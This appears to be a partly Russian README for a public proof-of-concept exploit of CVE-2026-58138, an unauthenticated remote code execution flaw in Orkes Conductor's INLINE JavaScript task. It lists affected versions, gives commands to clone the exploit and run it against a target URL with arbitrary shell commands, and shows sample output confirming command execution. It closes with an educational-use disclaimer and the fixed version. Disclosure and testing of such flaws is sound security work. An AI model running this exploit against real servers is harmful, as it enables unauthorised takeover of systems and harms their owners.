
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator
Критическая уязвимость удаленного выполнения кода в Orkes Conductor
CVE-2026-58138 — это критическая уязвимость неавторизованного удаленного выполнения кода (RCE), затрагивающая Orkes Conductor версий с 3.21.21 по 3.30.1. Эта уязвимость позволяет атакующим выполнять произвольные команды на сервере Conductor без необходимости аутентификации, что потенциально может привести к полной компрометации системы.
Уязвимость существует в типе задачи INLINE в движке рабочих процессов Orkes Conductor. Задача INLINE поддерживает выполнение JavaScript с доступом к Java-объектам через eval, что позволяет атакующему:
INLINE с JavaScript-кодомjava.lang.Runtime.exec()| Диапазон версий | Статус |
|---|---|
| 3.21.21 - 3.30.1 | ✅ Уязвим |
| > 3.30.1 | ❌ Исправлена |
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# Make the script executable
chmod +x CVE-2026-58138.py
# Verify installation
python3 CVE-2026-58138.py --help
# Basic usage
python3 CVE-2026-58138.py http://target:8080
# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 или новееТолько для образовательных целей и исследований в области безопасности. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.
⭐ Полезно? Поставьте звезду на GitHub ⭐